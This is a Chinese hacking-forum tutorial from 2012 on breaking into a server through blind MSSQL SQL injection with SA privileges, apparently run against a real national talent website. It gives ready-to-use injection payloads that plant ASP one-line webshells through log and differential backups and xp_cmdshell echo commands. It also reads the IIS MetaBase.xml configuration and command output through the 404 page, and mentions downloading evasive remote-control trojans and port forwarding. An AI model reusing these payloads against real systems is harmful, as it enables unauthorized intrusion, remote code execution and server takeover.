找回密码
 立即注册
查看: 2674|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
* w( o! w5 D, B  H; L% I6 D0 T  R  d" ]% l( Y
# v, m; @8 m6 G4 N. b: Q5 r& [
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
" m9 k& r4 V6 B4 a6 j" e7 p5 X% h  x9 t8 ~/ D" u6 L1 K
                                                                   h& @3 O5 w0 r: A+ N5 J0 d
                                                                 ( W% N" M: ]9 n9 T
                                                                  论坛: http://www.90team.net/+ i  g& [9 b; E' k& v
) z/ L. n5 w7 o: n
& A4 l, H& C) B, B1 X, @1 a$ `

1 n- Z4 w1 S" E8 l友情检测国家人才网  ^. g' ^' Q8 V% s8 H

% F% k4 e# b1 ]# X( \- U* s/ A. q9 i9 C" o5 V
内容:MSSQL注入SA权限不显错模式下的入侵1 p+ ]- G6 o+ I/ N- ~
: D; i8 Q' q2 p8 `

" ?% v" U0 {7 B1 v7 N7 \1 _一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
& t7 L* e! b/ ~/ Y6 @, o) i
& n, i: q. R' h3 t" {* h我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
) u* A$ @/ }7 |" u* g& w/ t& O! T  f" i) J4 x, ]" ~% d8 D4 C
# x: x, {: B' T2 _  q5 S
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
  j5 D  c+ c6 N# i$ x, U/ b" U  ~$ s1 q( g' b! |2 M8 |5 O% Q
思路:
% `$ f( \5 k, B5 {9 g1 F; M2 ?! u( h) x  [
首先:
. v4 j# I. }# {0 ~( O! C- `4 i& S  ]
2 z# c/ f* H$ f/ E+ [- O通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
5 L) e5 B$ o+ I0 y% u; c
, y: h3 U5 b! x# q* `- c1.日志备份获得Webshell
( V# u+ L# m' ~1 N$ ^9 T2 B# y, o  \4 Y, F2 s/ O
2.数据库差异备份获得Webshell
9 [$ @+ `% }, H, D+ E& M1 t$ Z* u: B6 W
4.直接下载免杀远控木马。
- E+ U7 e* o( V; y9 S$ A& T$ z2 P, G+ q; p7 v" ^4 x
5.直接下载LCX将服务器端口转发出来& a5 c/ F. q0 o  G0 Q
2 n$ P7 V' f* g8 _8 J) c; R: o
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
, ]6 O5 l; s: ~; d5 Q6 W0 s: u* e( c$ Q
; q3 s0 K% q' u' ?1 ~

, c- g8 M+ _5 j. }' n% R在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
- g4 e6 d+ g2 H
, [; \& {# b- H: b9 ]: h4 F我直接演示后面一个方法" V) y' |- x& p* e/ k7 z
6 Y+ ~5 C4 M  x& b
3 |7 `( T* V" y
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
1 K. u8 a8 ~0 n
: |0 ~, w, P( O' `8 V7 e2 N4 @5 G# L) W) m: a

  z* \2 O5 B0 q" i2 r( z2 t" f* v
◆日志备份:
. g+ M6 s8 l( M, v/ j4 [6 x0 g  k" ]& e
/ c6 C; C: ?% {% a* f: a0 }
1. 进行初始备份
/ y! t9 p: l# s9 g/ d" O; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
. z) F, Y7 J* i% }8 d
& y/ k) {1 P" _4 j6 @+ h! S2. 插入数据& E( v) C. B* U+ O
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
8 v' {9 Y7 D0 V! l' z+ ^1 {) D5 y: c. R& S& v1 g6 z
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
! R" p  t3 p# B% T+ Y9 C( w  ' u. B. E! W2 q: o: L% d$ o2 Q4 ]
3. 备份并获得文件,删除临时表
; v0 p, F5 ^: m- K1 t9 H; d2 W;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
" Q" ^3 n8 w2 V% T& E  A
8 e* {! y3 g) d  ?2 }  V; P6 |' J" H2 k* m# Y+ r- z
1 a5 W5 {9 X% G/ z9 {
◆数据库差异备份- o  v6 C( [( @9 \
$ i3 ]! R% X9 |3 I# ^
(1. 进行差异备份准备工作7 n2 z5 d1 a- d9 x* |: P' D' O
2 x0 R0 B1 ?- ]) W. v4 w  u. @
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--4 l0 U' U: ^, C. Z4 K1 l

& U7 n$ A* Y; n7 g# t( q* M- f) ?上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码& |$ J6 P4 x: p  z# Y
0 K. K" Z0 E) a5 a2 \% Z
1 D* `" X5 O2 A
(2. 将数据写入到数据库
' G4 X* _4 I# D2 C% S6 w, n;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
6 R$ o. D$ T0 M4 [* s4 D9 C+ f8 y4 \* R2 q  s
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>1 P, @3 S2 g4 o  {! r& r; F
) t/ g; ]% s  t5 i1 g
3. 备份数据库并清理临时文件2 k( j5 W% w  K6 d6 j- X$ D$ y$ [' k

; p* D' I8 x5 ^0 c' l;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--$ \$ x5 J, E1 }8 X/ \; B4 z
0 L- H$ S3 l* [4 `8 g4 a
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 - o  o. A+ a* g2 {
/ E% ~; M3 F" ]0 K

- A) T0 l+ E5 P( U+ S
5 H) F% P; D* B# }5 o. B用^转义字符来写ASP(一句话木马)文件的方法:   
7 I9 ~5 r& x. W" S- W: y9 A1 \+ i3 X
- Y% ]+ {- ?6 I1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--: K) o# o1 a6 }
. X# ?: v/ |# D6 o5 G  i
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
; g4 m% J! i/ W( q
0 l8 h$ H6 b9 q9 Y读取IIS配置信息获取web路径
/ h  _* q. ]0 V" [3 f( P' u* M, @' p) V8 d& l/ y
     
0 b" i, }0 f, q: F% w     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--% n* ]( k( z3 y' I  M9 Z

0 b3 Q( O8 s# o执行命令* ~& Q1 t! B  |2 H
     
4 d( ]) u: q/ o     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--. f$ [5 g- B; f# }6 R9 X

0 D/ r$ B; x  B3 ]( L, m) a7 Y% i( s$ W3 ]1 t  a$ c0 ^  @

8 Y+ R% X+ D2 |( ?" H! n9 U( G+ l5 K
2 B2 e' b7 Q9 f& {2 h" p

; U% i: W, v' \) D+ o
4 b3 Y6 r( V7 Z) u4 O
6 z4 F; C' ?* k& S1 f4 Q- h- \4 s# P& `0 P0 t
0 b6 a$ k8 ~9 q% l* T9 T1 ]! V. ?

% H6 f: n; Z9 a6 X8 t
8 Z5 U( A5 B) d6 U7 v) R8 I( W; e+ L! I' H! h* g" D

1 v7 S5 o# E& {1 N0 F) ~. h6 y, V% w: p: n6 a* x% @( X/ D% [. y

. i# ~3 W7 O: Y* N' L2 z) `! \% |" m7 ?

& h, Q0 P, m( a4 `' v7 {# o4 n' s( [
& r7 Y2 p+ g, L3 g4 a" N
% R! _6 q% P) [. G- ~; f
$ n& l3 e3 i  Z- f  ]$ }  j4 Z
' u! _6 o1 @7 t1 @3 Q% W  A
' {0 w2 ~  \( T) ~, c9 P/ c) Z" Z* |% c

" F" k5 s) G, ]7 x  `* O3 ?
" Q' ~$ B$ @' ^
$ q. ^* _& x" o; _9 I- K, Q9 ~, B# [! b- Z) _/ ~9 e

4 j: L: J/ D- A& H! q, v
. i: X9 i0 g5 |, r
: x9 d( ~) |1 A/ k, k1 ~1 h/ p  h! O3 D

! B* a% g9 F) K, E  Q) r# I. w) k" S7 F, K. c$ q& {/ i+ \

  I, n% D' l9 Y7 M1 O2 r) M6 s4 r6 k. u) l1 m8 m
- T2 b% c' p! R! t' ?, j% V
) S, l1 _% ]; R  ]4 r" W5 i

9 L6 g6 m! w' B" T; a4 W
7 A  o1 }' q" ?4 u  u: j) X
, i0 G, ^: R- j: k. ]
4 U' u* E7 p( x. w1 k: S5 l; u# o( X9 X0 s
# Z1 J8 H, ^& v3 ]) @& B8 I
$ Y1 c3 R) ~9 Q9 z+ c9 d

+ E3 `+ F: l* y$ {0 O& o! M: M
, T; [3 ?) ^7 k" X. G7 A- v; w* @1 B5 B# V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表